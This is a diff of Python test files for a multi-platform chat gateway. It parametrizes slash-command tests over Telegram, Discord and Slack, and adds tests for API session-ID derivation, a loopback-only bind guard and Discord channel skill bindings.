Choice=lambda **kwargs: SimpleNamespace(**kwargs),
|
||||
)
|
||||
discord_mod.opus.is_loaded.return_value = True
|
||||
|
||||
ext_mod = MagicMock()
|
||||
commands_mod = MagicMock()
|
||||
commands_mod.Bot = MagicMock
|
||||
ext_mod.commands = commands_mod
|
||||
|
||||
sys.modules.setdefault("discord", discord_mod)
|
||||
sys.modules.setdefault("discord.ext", ext_mod)
|
||||
sys.modules.setdefault("discord.ext.commands", commands_mod)
|
||||
sys.modules.setdefault("discord.opus", discord_mod.opus)
|
||||
|
||||
|
||||
def _ensure_slack_mock():
|
||||
"""Install mock slack modules so SlackAdapter can be imported."""
|
||||
if "slack_bolt" in sys.modules and hasattr(sys.modules["slack_bolt"], "__file__"):
|
||||
return # Real library installed
|
||||
|
||||
slack_bolt = MagicMock()
|
||||
slack_bolt.async_app.AsyncApp = MagicMock
|
||||
slack_bolt.adapter.socket_mode.async_handler.AsyncSocketModeHandler = MagicMock
|
||||
|
||||
slack_sdk = MagicMock()
|
||||
slack_sdk.web.async_client.AsyncWebClient = MagicMock
|
||||
|
||||
for name, mod in [
|
||||
("slack_bolt", slack_bolt),
|
||||
("slack_bolt.async_app", slack_bolt.async_app),
|
||||
("slack_bolt.adapter", slack_bolt.adapter),
|
||||
("slack_bolt.adapter.socket_mode", slack_bolt.adapter.socket_mode),
|
||||
("slack_bolt.adapter.socket_mode.async_handler", slack_bolt.adapter.socket_mode.async_handler),
|
||||
("slack_sdk", slack_sdk),
|
||||
("slack_sdk.web", slack_sdk.web),
|
||||
("slack_sdk.web.async_client", slack_sdk.web.async_client),
|
||||
]:
|
||||
sys.modules.setdefault(name, mod)
|
||||
|
||||
|
||||
_ensure_telegram_mock()
|
||||
_ensure_discord_mock()
|
||||
_ensure_slack_mock()
|
||||
|
||||
from gateway.platforms.discord import DiscordAdapter # noqa: E402
|
||||
from gateway.platforms.telegram import TelegramAdapter # noqa: E402
|
||||
|
||||
import gateway.platforms.slack as _slack_mod # noqa: E402
|
||||
_slack_mod.SLACK_AVAILABLE = True
|
||||
from gateway.platforms.slack import SlackAdapter # noqa: E402
|
||||
|
||||
#GatewayRunner factory (based on tests/gateway/test_status_command.py)
|
||||
|
||||
def make_runner(session_entry: SessionEntry) -> "GatewayRunner":
|
||||
# Platform-generic factories
|
||||
|
||||
def make_source(platform: Platform, chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> SessionSource:
|
||||
return SessionSource(
|
||||
platform=platform,
|
||||
chat_id=chat_id,
|
||||
user_id=user_id,
|
||||
user_name="e2e_tester",
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
def make_session_entry(platform: Platform, source: SessionSource = None) -> SessionEntry:
|
||||
source = source or make_source(platform)
|
||||
return SessionEntry(
|
||||
session_key=build_session_key(source),
|
||||
session_id=f"sess-{uuid.uuid4().hex[:8]}",
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now(),
|
||||
platform=platform,
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
def make_event(platform: Platform, text: str = "/help", chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> MessageEvent:
|
||||
return MessageEvent(
|
||||
text=text,
|
||||
source=make_source(platform, chat_id, user_id),
|
||||
message_id=f"msg-{uuid.uuid4().hex[:8]}",
|
||||
)
|
||||
|
||||
|
||||
def make_runner(platform: Platform, session_entry: SessionEntry = None) -> "GatewayRunner":
|
||||
"""Create a GatewayRunner with mocked internals for e2e testing.
|
||||
|
||||
Skips __init__ to avoid filesystem/network side effects.
|
||||
All command-dispatch dependencies are wired manually.
|
||||
"""
|
||||
from gateway.run import GatewayRunner
|
||||
|
||||
if session_entry is None:
|
||||
session_entry = make_session_entry(platform)
|
||||
|
||||
runner = object.__new__(GatewayRunner)
|
||||
runner.config = GatewayConfig(
|
||||
platforms={Platform.TELEGRAM: PlatformConfig(enabled=True, token="e2e-test-token")}
|
||||
platforms={platform: PlatformConfig(enabled=True, token="e2e-test-token")}
|
||||
)
|
||||
runner.adapters = {}
|
||||
runner._voice_mode = {}
|
||||
@@ -99,7 +196,6 @@ def make_runner(session_entry: SessionEntry) -> "GatewayRunner":
|
||||
runner._capture_gateway_honcho_if_configured = lambda *a, **kw: None
|
||||
runner._emit_gateway_run_progress = AsyncMock()
|
||||
|
||||
# Pairing store (used by authorization rejection path)
|
||||
runner.pairing_store = MagicMock()
|
||||
runner.pairing_store._is_rate_limited = MagicMock(return_value=False)
|
||||
runner.pairing_store.generate_code = MagicMock(return_value="ABC123")
|
||||
@@ -107,67 +203,63 @@ def make_runner(session_entry: SessionEntry) -> "GatewayRunner":
|
||||
return runner
|
||||
|
||||
|
||||
#TelegramAdapter factory
|
||||
def make_adapter(platform: Platform, runner=None):
|
||||
"""Create a platform adapter wired to *runner*, with send methods mocked."""
|
||||
if runner is None:
|
||||
runner = make_runner(platform)
|
||||
|
||||
def make_adapter(runner) -> TelegramAdapter:
|
||||
"""Create a TelegramAdapter wired to *runner*, with send methods mocked.
|
||||
|
||||
connect() is NOT called — no polling, no token lock, no real HTTP.
|
||||
"""
|
||||
config = PlatformConfig(enabled=True, token="e2e-test-token")
|
||||
adapter = TelegramAdapter(config)
|
||||
|
||||
# Mock outbound methods so tests can capture what was sent
|
||||
if platform == Platform.DISCORD:
|
||||
with patch.object(DiscordAdapter, "_load_participated_threads", return_value=set()):
|
||||
adapter = DiscordAdapter(config)
|
||||
platform_key = Platform.DISCORD
|
||||
elif platform == Platform.SLACK:
|
||||
adapter = SlackAdapter(config)
|
||||
platform_key = Platform.SLACK
|
||||
else:
|
||||
adapter = TelegramAdapter(config)
|
||||
platform_key = Platform.TELEGRAM
|
||||
|
||||
adapter.send = AsyncMock(return_value=SendResult(success=True, message_id="e2e-resp-1"))
|
||||
adapter.send_typing = AsyncMock()
|
||||
|
||||
# Wire adapter ↔ runner
|
||||
adapter.set_message_handler(runner._handle_message)
|
||||
runner.adapters[Platform.TELEGRAM] = adapter
|
||||
runner.adapters[platform_key] = adapter
|
||||
|
||||
return adapter
|
||||
|
||||
|
||||
#Helpers
|
||||
|
||||
def make_source(chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> SessionSource:
|
||||
return SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id=chat_id,
|
||||
user_id=user_id,
|
||||
user_name="e2e_tester",
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
def make_event(text: str, chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> MessageEvent:
|
||||
return MessageEvent(
|
||||
text=text,
|
||||
source=make_source(chat_id, user_id),
|
||||
message_id=f"msg-{uuid.uuid4().hex[:8]}",
|
||||
)
|
||||
|
||||
|
||||
def make_session_entry(source: SessionSource = None) -> SessionEntry:
|
||||
source = source or make_source()
|
||||
return SessionEntry(
|
||||
session_key=build_session_key(source),
|
||||
session_id=f"sess-{uuid.uuid4().hex[:8]}",
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now(),
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
async def send_and_capture(adapter: TelegramAdapter, text: str, **event_kwargs) -> AsyncMock:
|
||||
"""Send a message through the full e2e flow and return the send mock.
|
||||
|
||||
Drives: adapter.handle_message → background task → runner dispatch → adapter.send.
|
||||
"""
|
||||
event = make_event(text, **event_kwargs)
|
||||
async def send_and_capture(adapter, text: str, platform: Platform, **event_kwargs) -> AsyncMock:
|
||||
"""Send a message through the full e2e flow and return the send mock."""
|
||||
event = make_event(platform, text, **event_kwargs)
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
# Let the background task complete
|
||||
await asyncio.sleep(0.3)
|
||||
return adapter.send
|
||||
|
||||
|
||||
# Parametrized fixtures for platform-generic tests
|
||||
@pytest.fixture(params=[Platform.TELEGRAM, Platform.DISCORD, Platform.SLACK], ids=["telegram", "discord", "slack"])
|
||||
def platform(request):
|
||||
return request.param
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def source(platform):
|
||||
return make_source(platform)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def session_entry(platform, source):
|
||||
return make_session_entry(platform, source)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def runner(platform, session_entry):
|
||||
return make_runner(platform, session_entry)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def adapter(platform, runner):
|
||||
return make_adapter(platform, runner)
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
"""E2E tests for Telegram gateway slash commands.
|
||||
"""E2E tests for gateway slash commands (Telegram, Discord).
|
||||
|
||||
Each test drives a message through the full async pipeline:
|
||||
adapter.handle_message(event)
|
||||
@@ -7,6 +7,7 @@ Each test drives a message through the full async pipeline:
|
||||
→ adapter.send() (captured for assertions)
|
||||
|
||||
No LLM involved — only gateway-level commands are tested.
|
||||
Tests are parametrized over platforms via the ``platform`` fixture in conftest.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
@@ -15,46 +16,15 @@ from unittest.mock import AsyncMock
|
||||
import pytest
|
||||
|
||||
from gateway.platforms.base import SendResult
|
||||
from tests.e2e.conftest import (
|
||||
make_adapter,
|
||||
make_event,
|
||||
make_runner,
|
||||
make_session_entry,
|
||||
make_source,
|
||||
send_and_capture,
|
||||
)
|
||||
from tests.e2e.conftest import make_event, send_and_capture
|
||||
|
||||
|
||||
#Fixtures
|
||||
|
||||
@pytest.fixture()
|
||||
def source():
|
||||
return make_source()
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def session_entry(source):
|
||||
return make_session_entry(source)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def runner(session_entry):
|
||||
return make_runner(session_entry)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def adapter(runner):
|
||||
return make_adapter(runner)
|
||||
|
||||
|
||||
#Tests
|
||||
|
||||
class TestTelegramSlashCommands:
|
||||
class TestSlashCommands:
|
||||
"""Gateway slash commands dispatched through the full adapter pipeline."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_help_returns_command_list(self, adapter):
|
||||
send = await send_and_capture(adapter, "/help")
|
||||
async def test_help_returns_command_list(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/help", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
@@ -62,24 +32,23 @@ class TestTelegramSlashCommands:
|
||||
assert "/status" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_status_shows_session_info(self, adapter):
|
||||
send = await send_and_capture(adapter, "/status")
|
||||
async def test_status_shows_session_info(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/status", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Status output includes session metadata
|
||||
assert "session" in response_text.lower() or "Session" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_resets_session(self, adapter, runner):
|
||||
send = await send_and_capture(adapter, "/new")
|
||||
async def test_new_resets_session(self, adapter, runner, platform):
|
||||
send = await send_and_capture(adapter, "/new", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
runner.session_store.reset_session.assert_called_once()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_stop_when_no_agent_running(self, adapter):
|
||||
send = await send_and_capture(adapter, "/stop")
|
||||
async def test_stop_when_no_agent_running(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/stop", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
@@ -87,8 +56,8 @@ class TestTelegramSlashCommands:
|
||||
assert "no" in response_lower or "stop" in response_lower or "not running" in response_lower
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_commands_shows_listing(self, adapter):
|
||||
send = await send_and_capture(adapter, "/commands")
|
||||
async def test_commands_shows_listing(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/commands", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
@@ -96,29 +65,25 @@ class TestTelegramSlashCommands:
|
||||
assert "/" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_sequential_commands_share_session(self, adapter):
|
||||
async def test_sequential_commands_share_session(self, adapter, platform):
|
||||
"""Two commands from the same chat_id should both succeed."""
|
||||
send_help = await send_and_capture(adapter, "/help")
|
||||
send_help = await send_and_capture(adapter, "/help", platform)
|
||||
send_help.assert_called_once()
|
||||
|
||||
send_status = await send_and_capture(adapter, "/status")
|
||||
send_status = await send_and_capture(adapter, "/status", platform)
|
||||
send_status.assert_called_once()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
@pytest.mark.xfail(
|
||||
reason="Bug: _handle_provider_command references unbound model_cfg when config.yaml is absent",
|
||||
strict=False,
|
||||
)
|
||||
async def test_provider_shows_current_provider(self, adapter):
|
||||
send = await send_and_capture(adapter, "/provider")
|
||||
async def test_provider_shows_current_provider(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/provider", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "provider" in response_text.lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_verbose_responds(self, adapter):
|
||||
send = await send_and_capture(adapter, "/verbose")
|
||||
async def test_verbose_responds(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/verbose", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
@@ -126,42 +91,50 @@ class TestTelegramSlashCommands:
|
||||
assert "verbose" in response_text.lower() or "tool_progress" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_personality_lists_options(self, adapter):
|
||||
send = await send_and_capture(adapter, "/personality")
|
||||
async def test_personality_lists_options(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/personality", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "personalit" in response_text.lower() # matches "personality" or "personalities"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_yolo_toggles_mode(self, adapter):
|
||||
send = await send_and_capture(adapter, "/yolo")
|
||||
async def test_yolo_toggles_mode(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/yolo", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "yolo" in response_text.lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_compress_command(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/compress", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "compress" in response_text.lower() or "context" in response_text.lower()
|
||||
|
||||
|
||||
class TestSessionLifecycle:
|
||||
"""Verify session state changes across command sequences."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_then_status_reflects_reset(self, adapter, runner, session_entry):
|
||||
async def test_new_then_status_reflects_reset(self, adapter, runner, session_entry, platform):
|
||||
"""After /new, /status should report the fresh session."""
|
||||
await send_and_capture(adapter, "/new")
|
||||
await send_and_capture(adapter, "/new", platform)
|
||||
runner.session_store.reset_session.assert_called_once()
|
||||
|
||||
send = await send_and_capture(adapter, "/status")
|
||||
send = await send_and_capture(adapter, "/status", platform)
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Session ID from the entry should appear in the status output
|
||||
assert session_entry.session_id[:8] in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_is_idempotent(self, adapter, runner):
|
||||
async def test_new_is_idempotent(self, adapter, runner, platform):
|
||||
"""/new called twice should not crash."""
|
||||
await send_and_capture(adapter, "/new")
|
||||
await send_and_capture(adapter, "/new")
|
||||
await send_and_capture(adapter, "/new", platform)
|
||||
await send_and_capture(adapter, "/new", platform)
|
||||
assert runner.session_store.reset_session.call_count == 2
|
||||
|
||||
|
||||
@@ -169,11 +142,11 @@ class TestAuthorization:
|
||||
"""Verify the pipeline handles unauthorized users."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_unauthorized_user_gets_pairing_response(self, adapter, runner):
|
||||
async def test_unauthorized_user_gets_pairing_response(self, adapter, runner, platform):
|
||||
"""Unauthorized DM should trigger pairing code, not a command response."""
|
||||
runner._is_user_authorized = lambda _source: False
|
||||
|
||||
event = make_event("/help")
|
||||
event = make_event(platform, "/help")
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
@@ -185,11 +158,11 @@ class TestAuthorization:
|
||||
assert "recognize" in response_text.lower() or "pair" in response_text.lower() or "ABC123" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_unauthorized_user_does_not_get_help(self, adapter, runner):
|
||||
async def test_unauthorized_user_does_not_get_help(self, adapter, runner, platform):
|
||||
"""Unauthorized user should NOT see the help command output."""
|
||||
runner._is_user_authorized = lambda _source: False
|
||||
|
||||
event = make_event("/help")
|
||||
event = make_event(platform, "/help")
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
@@ -204,12 +177,12 @@ class TestSendFailureResilience:
|
||||
"""Verify the pipeline handles send failures gracefully."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_failure_does_not_crash_pipeline(self, adapter):
|
||||
async def test_send_failure_does_not_crash_pipeline(self, adapter, platform):
|
||||
"""If send() returns failure, the pipeline should not raise."""
|
||||
adapter.send = AsyncMock(return_value=SendResult(success=False, error="network timeout"))
|
||||
adapter.set_message_handler(adapter._message_handler) # re-wire with same handler
|
||||
adapter.set_message_handler(adapter._message_handler) # re-wire with same handler
|
||||
|
||||
event = make_event("/help")
|
||||
event = make_event(platform, "/help")
|
||||
# Should not raise — pipeline handles send failures internally
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
@@ -26,6 +26,7 @@ from gateway.platforms.api_server import (
|
||||
APIServerAdapter,
|
||||
ResponseStore,
|
||||
_CORS_HEADERS,
|
||||
_derive_chat_session_id,
|
||||
check_api_server_requirements,
|
||||
cors_middleware,
|
||||
security_headers_middleware,
|
||||
@@ -658,6 +659,98 @@ class TestChatCompletionsEndpoint:
|
||||
data = await resp.json()
|
||||
assert "Provider failed" in data["error"]["message"]
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_stable_session_id_across_turns(self, adapter):
|
||||
"""Same conversation (same first user message) produces the same session_id."""
|
||||
mock_result = {"final_response": "ok", "messages": [], "api_calls": 1}
|
||||
|
||||
app = _create_app(adapter)
|
||||
session_ids = []
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
# Turn 1: single user message
|
||||
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
|
||||
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
|
||||
await cli.post(
|
||||
"/v1/chat/completions",
|
||||
json={
|
||||
"model": "hermes-agent",
|
||||
"messages": [{"role": "user", "content": "Hello"}],
|
||||
},
|
||||
)
|
||||
session_ids.append(mock_run.call_args.kwargs["session_id"])
|
||||
|
||||
# Turn 2: same first message, conversation grew
|
||||
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
|
||||
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
|
||||
await cli.post(
|
||||
"/v1/chat/completions",
|
||||
json={
|
||||
"model": "hermes-agent",
|
||||
"messages": [
|
||||
{"role": "user", "content": "Hello"},
|
||||
{"role": "assistant", "content": "Hi there!"},
|
||||
{"role": "user", "content": "How are you?"},
|
||||
],
|
||||
},
|
||||
)
|
||||
session_ids.append(mock_run.call_args.kwargs["session_id"])
|
||||
|
||||
assert session_ids[0] == session_ids[1], "Session ID should be stable across turns"
|
||||
assert session_ids[0].startswith("api-"), "Derived session IDs should have api- prefix"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_different_conversations_get_different_session_ids(self, adapter):
|
||||
"""Different first messages produce different session_ids."""
|
||||
mock_result = {"final_response": "ok", "messages": [], "api_calls": 1}
|
||||
|
||||
app = _create_app(adapter)
|
||||
session_ids = []
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
for first_msg in ["Hello", "Goodbye"]:
|
||||
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
|
||||
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
|
||||
await cli.post(
|
||||
"/v1/chat/completions",
|
||||
json={
|
||||
"model": "hermes-agent",
|
||||
"messages": [{"role": "user", "content": first_msg}],
|
||||
},
|
||||
)
|
||||
session_ids.append(mock_run.call_args.kwargs["session_id"])
|
||||
|
||||
assert session_ids[0] != session_ids[1]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _derive_chat_session_id unit tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestDeriveChatSessionId:
|
||||
def test_deterministic(self):
|
||||
"""Same inputs always produce the same session ID."""
|
||||
a = _derive_chat_session_id("sys", "hello")
|
||||
b = _derive_chat_session_id("sys", "hello")
|
||||
assert a == b
|
||||
|
||||
def test_prefix(self):
|
||||
assert _derive_chat_session_id(None, "hi").startswith("api-")
|
||||
|
||||
def test_different_system_prompt(self):
|
||||
a = _derive_chat_session_id("You are a pirate.", "Hello")
|
||||
b = _derive_chat_session_id("You are a robot.", "Hello")
|
||||
assert a != b
|
||||
|
||||
def test_different_first_message(self):
|
||||
a = _derive_chat_session_id(None, "Hello")
|
||||
b = _derive_chat_session_id(None, "Goodbye")
|
||||
assert a != b
|
||||
|
||||
def test_none_system_prompt(self):
|
||||
"""None system prompt doesn't crash."""
|
||||
sid = _derive_chat_session_id(None, "test")
|
||||
assert isinstance(sid, str) and len(sid) > 4
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# /v1/responses endpoint
|
||||
|
||||
@@ -0,0 +1,132 @@
|
||||
"""Tests for the API server bind-address startup guard.
|
||||
|
||||
Validates that is_network_accessible() correctly classifies addresses and
|
||||
that connect() refuses to start on non-loopback without API_SERVER_KEY.
|
||||
"""
|
||||
|
||||
import socket
|
||||
from unittest.mock import AsyncMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from gateway.config import PlatformConfig
|
||||
from gateway.platforms.api_server import APIServerAdapter
|
||||
from gateway.platforms.base import is_network_accessible
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Unit tests: is_network_accessible()
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestIsNetworkAccessible:
|
||||
"""Direct tests for the address classification helper."""
|
||||
|
||||
# -- Loopback (safe, should return False) --
|
||||
|
||||
def test_ipv4_loopback(self):
|
||||
assert is_network_accessible("127.0.0.1") is False
|
||||
|
||||
def test_ipv6_loopback(self):
|
||||
assert is_network_accessible("::1") is False
|
||||
|
||||
def test_ipv4_mapped_loopback(self):
|
||||
# ::ffff:127.0.0.1 — Python's is_loopback returns False for mapped
|
||||
# addresses; the helper must unwrap and check ipv4_mapped.
|
||||
assert is_network_accessible("::ffff:127.0.0.1") is False
|
||||
|
||||
# -- Network-accessible (should return True) --
|
||||
|
||||
def test_ipv4_wildcard(self):
|
||||
assert is_network_accessible("0.0.0.0") is True
|
||||
|
||||
def test_ipv6_wildcard(self):
|
||||
# This is the bypass vector that the string-based check missed.
|
||||
assert is_network_accessible("::") is True
|
||||
|
||||
def test_ipv4_mapped_unspecified(self):
|
||||
assert is_network_accessible("::ffff:0.0.0.0") is True
|
||||
|
||||
def test_private_ipv4(self):
|
||||
assert is_network_accessible("10.0.0.1") is True
|
||||
|
||||
def test_private_ipv4_class_c(self):
|
||||
assert is_network_accessible("192.168.1.1") is True
|
||||
|
||||
def test_public_ipv4(self):
|
||||
assert is_network_accessible("8.8.8.8") is True
|
||||
|
||||
# -- Hostname resolution --
|
||||
|
||||
def test_localhost_resolves_to_loopback(self):
|
||||
loopback_result = [
|
||||
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("127.0.0.1", 0)),
|
||||
]
|
||||
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=loopback_result):
|
||||
assert is_network_accessible("localhost") is False
|
||||
|
||||
def test_hostname_resolving_to_non_loopback(self):
|
||||
non_loopback_result = [
|
||||
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("10.0.0.1", 0)),
|
||||
]
|
||||
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=non_loopback_result):
|
||||
assert is_network_accessible("my-server.local") is True
|
||||
|
||||
def test_hostname_mixed_resolution(self):
|
||||
"""If a hostname resolves to both loopback and non-loopback, it's
|
||||
network-accessible (any non-loopback address is enough)."""
|
||||
mixed_result = [
|
||||
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("127.0.0.1", 0)),
|
||||
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("10.0.0.1", 0)),
|
||||
]
|
||||
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=mixed_result):
|
||||
assert is_network_accessible("dual-host.local") is True
|
||||
|
||||
def test_dns_failure_fails_closed(self):
|
||||
"""Unresolvable hostnames should require an API key (fail closed)."""
|
||||
with patch(
|
||||
"gateway.platforms.base._socket.getaddrinfo",
|
||||
side_effect=socket.gaierror("Name resolution failed"),
|
||||
):
|
||||
assert is_network_accessible("nonexistent.invalid") is True
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Integration tests: connect() startup guard
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestConnectBindGuard:
|
||||
"""Verify that connect() refuses dangerous configurations."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_refuses_ipv4_wildcard_without_key(self):
|
||||
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "0.0.0.0"}))
|
||||
result = await adapter.connect()
|
||||
assert result is False
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_refuses_ipv6_wildcard_without_key(self):
|
||||
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "::"}))
|
||||
result = await adapter.connect()
|
||||
assert result is False
|
||||
|
||||
def test_allows_loopback_without_key(self):
|
||||
"""Loopback with no key should pass the guard."""
|
||||
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "127.0.0.1"}))
|
||||
assert adapter._api_key == ""
|
||||
# The guard condition: is_network_accessible(host) AND NOT api_key
|
||||
# For loopback, is_network_accessible is False so the guard does not block.
|
||||
assert is_network_accessible(adapter._host) is False
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_allows_wildcard_with_key(self):
|
||||
"""Non-loopback with a key should pass the guard."""
|
||||
adapter = APIServerAdapter(
|
||||
PlatformConfig(enabled=True, extra={"host": "0.0.0.0", "key": "sk-test"})
|
||||
)
|
||||
# The guard checks: is_network_accessible(host) AND NOT api_key
|
||||
# With a key set, the guard should not block.
|
||||
assert adapter._api_key == "sk-test"
|
||||
assert is_network_accessible("0.0.0.0") is True
|
||||
# Combined: the guard condition is False (key is set), so it passes
|
||||
@@ -0,0 +1,64 @@
|
||||
"""Tests for Discord channel_skill_bindings auto-skill resolution."""
|
||||
from unittest.mock import MagicMock
|
||||
import pytest
|
||||
|
||||
|
||||
def _make_adapter():
|
||||
"""Create a minimal DiscordAdapter with mocked config."""
|
||||
from gateway.platforms.discord import DiscordAdapter
|
||||
adapter = object.__new__(DiscordAdapter)
|
||||
adapter.config = MagicMock()
|
||||
adapter.config.extra = {}
|
||||
return adapter
|
||||
|
||||
|
||||
class TestResolveChannelSkills:
|
||||
def test_no_bindings_returns_none(self):
|
||||
adapter = _make_adapter()
|
||||
assert adapter._resolve_channel_skills("123") is None
|
||||
|
||||
def test_match_by_channel_id(self):
|
||||
adapter = _make_adapter()
|
||||
adapter.config.extra = {
|
||||
"channel_skill_bindings": [
|
||||
{"id": "100", "skills": ["skill-a", "skill-b"]},
|
||||
]
|
||||
}
|
||||
assert adapter._resolve_channel_skills("100") == ["skill-a", "skill-b"]
|
||||
|
||||
def test_match_by_parent_id(self):
|
||||
adapter = _make_adapter()
|
||||
adapter.config.extra = {
|
||||
"channel_skill_bindings": [
|
||||
{"id": "200", "skills": ["forum-skill"]},
|
||||
]
|
||||
}
|
||||
# channel_id doesn't match, but parent_id does (forum thread)
|
||||
assert adapter._resolve_channel_skills("999", parent_id="200") == ["forum-skill"]
|
||||
|
||||
def test_no_match_returns_none(self):
|
||||
adapter = _make_adapter()
|
||||
adapter.config.extra = {
|
||||
"channel_skill_bindings": [
|
||||
{"id": "100", "skills": ["skill-a"]},
|
||||
]
|
||||
}
|
||||
assert adapter._resolve_channel_skills("999") is None
|
||||
|
||||
def test_single_skill_string(self):
|
||||
adapter = _make_adapter()
|
||||
adapter.config.extra = {
|
||||
"channel_skill_bindings": [
|
||||
{"id": "100", "skill": "solo-skill"},
|
||||
]
|
||||
}
|
||||
assert adapter._resolve_channel_skills("100") == ["solo-skill"]
|
||||
|
||||
def test_dedup_preserves_order(self):
|
||||
adapter = _make_adapter()
|
||||
adapter.config.extra = {
|
||||
"channel_skill_bindings": [
|
||||
{"id": "100", "skills": ["a", "b", "a", "c", "b"]},
|
||||
]
|
||||
}
|
||||
